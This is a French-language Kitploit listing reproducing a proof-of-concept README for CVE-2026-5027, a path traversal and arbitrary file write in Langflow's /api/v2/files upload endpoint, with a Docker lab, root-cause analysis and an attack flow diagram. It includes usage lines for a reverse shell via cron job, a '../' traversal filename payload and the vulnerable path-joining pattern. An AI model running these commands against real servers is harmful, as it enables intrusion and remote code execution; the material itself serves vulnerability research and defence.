Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-5027 — Proof-of-concept d'exploit pour CVE-2026-5027, une traversée de chemin et écriture arbitraire de fichier dans le point de terminaison /api/v2/files de Langflow, avec un laboratoire Docker et une option de reverse shell. | Kitploit
Outils/GitHubGitHub/yym8538/cve-2026-5027
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionOutil d'Accès à Distance
GitHubyym8538/cve-2026-5027

CVE-2026-5027

Proof-of-concept d'exploit pour CVE-2026-5027, une traversée de chemin et écriture arbitraire de fichier dans le point de terminaison /api/v2/files de Langflow, avec un laboratoire Docker et une option de reverse shell.

Voir le dépôt
1il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Ce post est un article de recherche publié par EQSTLab.

Merci à Yahia Hamza, qui a signalé et analysé cette vulnérabilité.

CVE-2026-5027

★ CVE-2026-5027 Langflow Path Traversal / Arbitrary File Write PoC ★ CVE-2026-5027 PoC test


Description

CVE-2026-5027 : Vulnérabilité d'écriture arbitraire de fichiers dans Langflow

description: Une vulnérabilité de traversée de chemin dans Langflow <= 1.8.4 permet aux attaquants d'écrire des fichiers arbitraires en dehors du répertoire de téléversement prévu via un filename multipart forgé fourni au point de terminaison /api/v2/files. Dans les déploiements où la connexion automatique est activée ou où l'authentification est autrement faiblement appliquée, ce problème peut être exploité pour obtenir une exécution de code à distance en écrivant du contenu contrôlé par l'attaquant à des emplacements sensibles du système de fichiers.


Configuration du laboratoire

Construisez et exécutez l'environnement vulnérable à l'aide de Docker :

Construire l'image

root@kitploit:~
docker build -t cve-2026-5027 .

Exécuter le conteneur

root@kitploit:~
docker run --rm -it -p 9013:9013 --name cve-2026-5027 cve-2026-5027

Comment l'utiliser

Exécution

root@kitploit:~
# Proof of concept (writes test file to /tmp/)
python3 CVE-2026-5027.py -t <TARGET>

# Reverse shell via cron job
python3 CVE-2026-5027.py -t <TARGET> --lhost <YOUR_IP> --lport 4444

Analyse

Point de terminaison vulnérable

root@kitploit:~
POST /api/v2/files

Le problème existe parce que la fonctionnalité de téléversement fait confiance à la valeur filename multipart fournie par le client. Au lieu de générer un nom de stockage sûr côté serveur ou de contraindre le chemin résolu à un répertoire de téléversement dédié, le chemin de code vulnérable permet à des séquences de traversée telles que ../ d'influencer le chemin de destination final.

Par conséquent, un attaquant peut s'échapper de la racine de stockage prévue et forcer l'application à écrire des fichiers à des emplacements arbitraires sur le système de fichiers du serveur.

Un flux d'exploitation représentatif est le suivant :

  1. Obtenir un jeton d'accès via une connexion normale ou un déploiement avec connexion automatique activée.
  2. Soumettre une requête de téléversement multipart à /api/v2/files.
  3. Fournir un filename forgé contenant des séquences de traversée de chemin.
  4. Amener Langflow à écrire du contenu contrôlé par l'attaquant en dehors du répertoire de stockage attendu.

Il s'agit fondamentalement d'un problème CWE-22 : Limitation incorrecte d'un nom de chemin à un répertoire restreint.

Cause racine technique

La faille de sécurité est causée par une assainissement et une validation insuffisants des chemins de fichiers contrôlés par l'utilisateur lors du traitement des téléversements. L'application accepte le nom de fichier client d'origine et le transmet au flux de stockage sans appliquer adéquatement la normalisation et le confinement du chemin.

D'un point de vue défensif, le schéma dangereux est conceptuellement similaire à ce qui suit :

root@kitploit:~
save_path = base_dir / file.filename

Si file.filename contient des composants de traversée de chemin tels que :

root@kitploit:~
../../../../tmp/poc.txt

le chemin résolu final peut pointer en dehors de base_dir, permettant une écriture arbitraire de fichiers.

Pourquoi c'est important

Les vulnérabilités d'écriture arbitraire de fichiers sont souvent plus graves que les problèmes de téléversement non restreint standard, car l'attaquant contrôle non seulement le contenu du fichier, mais aussi le chemin de destination. Selon les privilèges d'exécution du processus Langflow, cela peut permettre :

  • l'écrasement de fichiers de l'application
  • la modification de fichiers de démarrage ou de tâches planifiées
  • la persistance via l'initialisation du shell ou des fichiers de clés
  • l'escalade d'une écriture arbitraire de fichiers vers une exécution de code à distance

Scénario

root@kitploit:~
+-------------------------------------------+
|                  Attacker                 |
+-------------------------------------------+
                      |
                      | Obtain access token
                      | or abuse auto-login
                      v
+-------------------------------------------+
|        Langflow /api/v2/files             |
+-------------------------------------------+
                      |
                      | Crafted multipart filename
                      | (../ directory traversal)
                      v
+-------------------------------------------+
| Arbitrary File Write (Outside Upload Dir) |
+-------------------------------------------+
                      |
                      | Write to sensitive location
                      v
+-------------------------------------------+
|      Potential Remote Code Execution      |
+-------------------------------------------+

Avertissement

Ce dépôt n'a pas pour but de faciliter l'exploitation non autorisée d'instances Langflow. L'objectif de ce projet est d'aider les chercheurs en sécurité, les défenseurs et les développeurs à comprendre la vulnérabilité, à valider l'exposition dans des environnements contrôlés et à appliquer des mesures d'atténuation efficaces.


Références

https://www.tenable.com/security/research/tra-2026-26

https://www.cve.org/CVERecord?id=CVE-2026-5027

https://github.com/yahiahamza/CVE-2026-5027

https://github.com/langflow-ai/langflow

Télécharger l’outil